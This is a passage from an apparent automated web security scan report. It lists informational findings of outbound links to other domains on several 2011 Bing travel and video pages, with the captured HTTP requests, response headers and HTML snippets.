http://632763.r.redacted/?ld=4vpe-UY3FEJrxDtIo_0OaDrv2daIyfuCaOKG9VbLgKsuEuGi_1v956phG0uOkWcTlusALoaAhRbExB3LEJ0WBaLdSyonr8_HysRvIsDH8Vl5-bnFYns8gvigTorVUxDPeiO0zxAfA_MHjN54ET5XZ1BX6GyCIQgDxpS1pTP6hJusF_6DRNnQ_NTjuSZb6XliY0G-mWVH7g1c8KLKJN43_bRkzM8Pyc5dTOW-PLMzxbgeg1VAlM0mKObL2lCFecVL2dQIZmIRAmY3M99CMLhulLD05vSJiq9f_G8Rvn1rdFVWNtOGNBQzASeMc
http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx
http://www.redacted/

Request

GET /travel/deals/last-minute-flight-deals.do?cid=msn_tab&form=trvcon HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 116442
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:09:06 GMT
Connection: close
Set-Cookie: lbc=801; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-4098ubi97ki1nyz59phc2cqluqqg_VID-z1pliuomrgjd6fyz7bjb5gfae4faa_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:09:05 GMT; Path=/travel
Set-Cookie: JSESSIONID=A0C1F8D2DF78ABD0D0DCF0B91764466A; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=D3B0950C704649CF8B6003D0BA5B7255; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:05 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c4954f6be3aad4dd2922f5a6bae887e3e; expires=Tue, 29-Jan-2013 17:09:05 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:06 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,245.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,247.1')">Hotmail</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals1_dealsPage'); return false;" href="http://632763.r.redacted/?ld=4vpe-UY3FEJrxDtIo_0OaDrv2daIyfuCaOKG9VbLgKsuEuGi_1v956phG0uOkWcTlusALoaAhRbExB3LEJ0WBaLdSyonr8_HysRvIsDH8Vl5-bnFYns8gvigTorVUxDPeiO0zxAfA_MHjN54ET5XZ1BX6GyCIQgDxpS1pTP6hJusF_6DRNnQ_NTjuSZb6XliY0G-mWVH7g1c8KLKJN43_bRkzM8Pyc5dTOW-PLMzxbgeg1VAlM0mKObL2lCFecVL2dQIZmIRAmY3M99CMLhulLD05vSJiq9f_G8Rvn1rdFVWNtOGNBQzASeMc">Cruise Discounts--75% Off</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals2_dealsPage'); return false;" href="http://0.r.redacted/?ld=4vRc2VCxiS2CsWFY5fYFnzfMR9bLqLsUQenYLb8gfCqPVuKuBGftKMHmeSIkHgtAGa0ucWzxZ12SQgxm-J07fiHvUvzDTR-2qIdbihDISPjj1AyOxzZTHqsl6ovPqvPHlLIi319EwbDgwrP5OfweJN5FY_TTzSlTuoD0NQG6Oea4b6CVKyqBb0BO_mgRn_uSK0p-GI4l1ITGHU6xhCoSC3X4tLY-GO3mrWIAZlyQyR7pT5cQcICwXoqLOyf_QqXyJLnHyWUV33L8N4g0Zh01ckkd5GIit5LbnqMA9pwwXVQ7jzSJJ1O_OZQr9FSuBvoNR1IMcrhdI8aBzEQHsDKmkM0zVUCUwq9PQZK4e7vdCDUR3BciWuECZjcz04TOPQYUlJ-AbOP8OXXtEE8vdVnhppS6oEKcUCFX1czA">Super Cheap Cruise Deals</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'travelDeals_dealsPage','travelDeals3_dealsPage'); return false;" href="http://0.r.redacted/?ld=4v2XsHUQ0-SrGsNki-pVTkRQQMiqz2vGe6LxZI3Nl_zZpRiP3FTq7ilAztSO8eCxnVj9xywUdAqe7y9lok0zj6F2jtkEHvrW9o_N-VNWTRD-BhsClsFMFicbjdyagj3UztI6hGbwTRRAPZkI7WV02eIArFgIairMlazdeoyYV5pskl9EzexDnWsM0f0Vvp2GjpRuhOFK8sA-KBlB-0vanvTNKicdDYpdoeyefdX15BMomhX4oX3-iBl2zFxcGcEYgccKoHgkdtFV7JkJiZHIRODkH5KAqBL73usSmGiSI21yq9cq663W9rrfC7wS6gBeLDEXmdSlnp1AZyNMYOnCVSdJ09AqnlYh9pDHRLK1lDmas1VAlMfkDTbyiKcU8o8uTIwtIstxAmY3M9Hhq3VZ7HtGSsWjK8JvGDry-xLKt8Z1N1JTObJTR8m8k">Expedia Vacation Savings</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights1_dealsPage'); return false;" href="http://0.r.redacted/?ld=4vMMRVNeXw7SzNIQp8I8MSZzP10ltrxPPv672eFH0FbUVD3zRxYKNSKgHwKMCseQx0nmdzJGvQuC5H3Wf9amPrmwBOl-LS7we315ckpqTT7IrTa45qxQHMpBYf8OoxsbmYQI6wu5Od2VYSrZ_T-oSSAxHkzzR7IWM8xaMOwhzkjSJs6C5HQOVvlNO1JWBc5rGgAZ5lmmYp4BdKLSoQgZcqOBCQo05NEXR4_MOT1kGNgqATHf7FL68zfrA00BrQXBLoS2MVAhC9BC9BgR-COp5kPMqAOZrJvOO4IVdXOYrLLwg1VAlMzjwSR91se16Ks2NjkmMP8xAmY3M9rxxc7L7WI708owxlIKnAAy0mOR8n2dVuT1ItnNTrBfw">AA.com - Official Site</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights2_dealsPage'); return false;" href="http://13391.r.redacted/?ld=4vFYm3A_Rct80ovuFF1tnJzzjiKB0UlFcDeK5TvLUgyM9CzQrln1sJXcrCYaLfi_9Tse0NYLb3LWN01gnUZEB0sRZzrDWi41IjkK8B1YI7sy9hQE3iNL1Mgzu3J2s2HKCh814SSmve_LNm55kC-qDG3ZZRCtCFgLlr_DxqDQ8t4Nof0TOXtQmArBi_3Is9TQNUWvAwcio1uxFtd8aDixtsBXgkEQHcWLYVV_uCv46gRFaZNsXechzHsS_9PKNEBJ2hTS3ql0m28tjpv49qFOli4Jhha-qF5l0T6vPNIpaQ5CQ1VAlMGwLueDt9-TDph2CamBDcXhAmY3M9DXnT31BJQ6zT5EzPzAetD_eK-NviJFltvAl4_LHDR4E">Cheap Flights at $29*</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights3_dealsPage'); return false;" href="http://201283.r.redacted/?ld=4vLDL1HgXAN-_5sL37i1jw9DecPkefItJyNWHiqfhn-UtOVpKtxfFnfjp76J9sYSnwuZ0BJWfeXtmGr0f5JIMiqjIczusHQ7dNyKxCJyTgJfIDmXWl_YoH0-UP6vl2ZtT3u6k7WW7JrIWGzp0vMCmytvp5jXIi2emgZ1TXPZtDTNf1oeqGLAr0EDX9RGXz9p4lWEPmA58wIWbJhdwl6yoRmCWSog3RkYTq-7lHVazPy_lPcKiN9p7wc3wwuamCycV_bbPqtGT8LBZK4Nbzx82paoy-Tynirika1GAsbjp8tbphS_VL7wmbmzgf0-oD_-ZTn6myTrOsxxV9BXjC4xpmIjVUCUxGnr3GFFYV8gu2oyWuS8XkECZjcz397Q22g3XS_WEYTo8b835R7Y2-E7pLj_rJ1qzlRA-UUg">Cheap Flights: 60% Off</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights4_dealsPage'); return false;" href="http://0.r.redacted/?ld=4vHzm6vAY1K1SQoya6w6E2tYNw_GMcUSGEFugSjFhGFQhAxFIB9uehaz98ZVnPM6_yKIaEyLcYMYQPxkwWDz_ypsqRI19jD_DOzH7IShmBiHgpHcDUi1kVJq9Hq4ihrzu7FMORNXWJO9Jim-2UWFmf4sb8LB6DMJtzRKWr5iPYZXk-u34DqdHYIiwqGn5Cv9Tjhzp2mEbil-qHbGCedSloUblbuKyalsUWww63FUr9XQ7IFnYQ65oo6bDVQdk-J2pG8VnxPoUVB8ELLLLoG9_ulP1kCOYoCxP8BT66U7fdqok1VAlMwzwW1vMXot0bh3TrkVgB2xAmY3M9ajl0ztxzKHDH_GjBX2fBENiWDPpwlSxwfjOIAxzdTI8">Southwest - Official Site</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights5_dealsPage'); return false;" href="http://0.r.redacted/?ld=4vWA67IO3b_WJhNoawHMtUCeAmpJmtue4lCWkYfGCFf9UuCKBPSOjfJVtJQ-jOj27raVqXnvrOx8xowBVZvicWt1S0BkgYalvv8miQ4Vu3BkGVokUjZPNdSXLySkP_FBTFo5A24sXPACr1MJ7QfM_q_LUc6YPfaRmSKrD0U4KY3HPxJ_X2WxRarNIalN8s7YfNsr3DQr6GCumoVq2-uKNg_uweJbT3liqUDAX72qo3TFaHn-SWL1Dq6cMtaycW-sZ3zCQswH22nG2myc6nzRz3rCq2qDVLv8N5KYs3RTpb1jE9iqwybPdZES11g2Fq7QEy3MVl2bA7ScjOW9DZNZNOOjVUCUz9_e9zpcm5iGunm1dpONUoECZjcz22LbTgLNXeJK0sy99ohQTMQLIqeNOkujBxJnNveYu6TQ">Super Cheap Flights</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights6_dealsPage'); return false;" href="http://154875.r.redacted/?ld=4v3hc0Ha9kx9ipjmAjQdmQnRbOXZ5YE6OdgfmbvSIIbQQ__SgeJMDExBMg3CYUK0PglxbfIeSkVOfG1UNVI6_0yFRFuEIiTtlJt0xFuDga0NbqJRhI3L-uo3mDIz-jInw7vdT9KSgDVHVNc6fNPS-BQwtkMR7R4koL3MiEtiKXa8HnwzUBgL4V9gg3Uj28QSCFXJhWMwf2lQpeEpaUbj6Chd8V7qUVftFS7esVT0VmFcnbjbbHS5ZV4YLinT4L4lUJtWIK9wLU_YGVqeXNjya-pjVUCUxWnFkSuSCARH7RwZ7nF47WECZjcz05zNM32RPsfFoqoo__fQCA7pNXm_ws2kEa5cempcG5ew">Cheap Flights - 65% OFF</a>
...[SNIP]...
<div class="adHolder ">
                   <a rel="nofollow" class="headline" onkeypress="window.open(this.href); return false;" onclick="window.open(this.href); doOmniture_AdClick_Contained(this,'Flights_dealsPage','Flights7_dealsPage'); return false;" href="http://0.r.redacted/?ld=4vUbS6RAnqnusOGkgnp1vo3Z8k4aM1TwgeeYcasb4a2eUb38nyJIyCVmqFMQaWXTvgYqUiBlYq6rP-OZI2phTtQV5UbHbCqRAytcK9aM2M4zDYlK3lsoHp8fQeplBL4a0Pf4bD4QmltFC2e59btsF7ITG6p5LzmvvImvW8vtP_5GyxKjtrLxLMXtIcjICwf1wDPuMwVv7IAQuZsBkz1PMLUFr7DTKX6jQcnJQ2gkIYQJE4NYDHg36x5hK3VSQzVYdctNKwpLk9fh9xeBA-jH0ToYKdAUOX1Fyzje7-ZR_FeuFPOZNdMr5H3d6XhGzEvQFps_FTCjaDiAuHnr2lHKQ7sDVUCUzF0X1i1NyAMPR80c77me7pECZjcz3ZCYmgcFoTdwNhUXKmLrCynNs_NPY3UCNijLhTdTgwWQ">cheap flights</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,258.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,260.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,262.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,264.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,266.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,268.1')">Help</a>
...[SNIP]...

22.398. http://www.bing.com/travel/hotels previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/travel/hotels

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/travel/hotels?cid=msn_tab&form=trvcon

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx
http://www.redacted/

Request

GET /travel/hotels?cid=msn_tab&form=trvcon HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 33726
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:04 GMT
Connection: close
Set-Cookie: lbc=815; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z18eekj7qbvdloyz7o9t8m5l64jfq_VID-zhsolb3a21fh4yz48ur0251f5tc5_UID-; Domain=.bing.com; Expires=Mon, 28-Jan-2013 23:53:04 GMT; Path=/travel
Set-Cookie: JSESSIONID=5AA03B20B965054DE6A00C283694D6F2; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=670C758B51DB456797B1C247AFC69A86; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:04 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c393ed45e9ddb45cebb21b8419ba995f9; expires=Mon, 28-Jan-2013 23:53:04 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:04 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,81.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,83.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,94.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,96.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,98.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,100.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,102.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,104.1')">Help</a>
...[SNIP]...

22.399. http://www.bing.com/videos/browse previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/browse

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/browse?from=en-us_msnhp

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://mail.live.com/
http://www.redacted/

Request

GET /videos/browse?from=en-us_msnhp HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16742
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:21 GMT
Connection: close
Set-Cookie: _SS=SID=8AAD1D20A0D44F4A958E8BC645FCE285; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:21 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c29d1b901c82241e5b9b26fbb5dbd8567; expires=Mon, 28-Jan-2013 23:52:21 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:21 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,29.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,31.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,42.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,44.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,46.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,48.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,50.1')">About our ads</a>
...[SNIP]...

22.400. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa?q=The+Bachelor&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=0adbe522-6a74-451d-8cd6-9845b029ea9f&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=29c72bc5-8bec-4507-8628-d78be2839869&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=0d1c240e-7bf9-416b-95d4-75f4f5ffc8e0&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=43065b0c-5953-34d2-e109-849136b24fc4&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=6a5e9ed3-864e-44e1-8647-406388ff03a6&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93460806-1390-4bcc-b73e-707aa1ec15b2&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=ad3c2eb0-1f32-11df-bdab-297063a74c6d&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img4.catalog.video.redacted/Image.aspx?uuid=44ab0283-7d4d-490a-bf56-a89601f19d8f&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=96753e0a-093b-11de-a48f-df3463a74c6d&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=ace94fcc-a11e-46dc-8876-396aaf0d06e4&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fbachelor-brad-womack-part-1%2f17w4gt3fa%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.hulu.com/the-tonight-show-with-jay-leno
http://www.hulu.com/watch?content_id=50117742
http://www.redacted/

Request

GET /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa?q=The+Bachelor&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=667
Content-Length: 106262
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:11:05 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 16:59:58 GMT
Connection: close
Set-Cookie: _SS=SID=6FBAF5DF92E74053A05972DB25FA761C; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 16:59:58 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7a7c6b49258248c2b9414cc9e095d037; expires=Tue, 29-Jan-2013 16:59:58 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621019&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 16:59:58 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fbachelor-brad-womack-part-1%2f17w4gt3fa%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/the-tonight-show-with-jay-leno" data-instName="InfoRelatedLinks">Hulu - The Tonight Show with Jay Leno</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/watch?content_id=50117742" data-instName="InfoRelatedLinks">Hulu Watch Page - Bachelor Brad Womack, Part 1</a>
...[SNIP]...
lor&rel=MSN" class="motionThumb playerUrl"
title="We recap "The Bachelor," "House," "19 Kids and Counting" and "Skins."" >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=43065b0c-5953-34d2-e109-849136b24fc4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;shares a personal story with the rest of the ladies. "The Bachelor" airs Mondays at 8 p.m. ET/PT on ABC." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=44ab0283-7d4d-490a-bf56-a89601f19d8f&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ies, starring "Bachelor" alum Brad Womack. "The Bachelor" returns Monday, Jan. 3, at 8 p.m. ET/PT on ABC." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=ace94fcc-a11e-46dc-8876-396aaf0d06e4&w=160&h=90&so=4" />

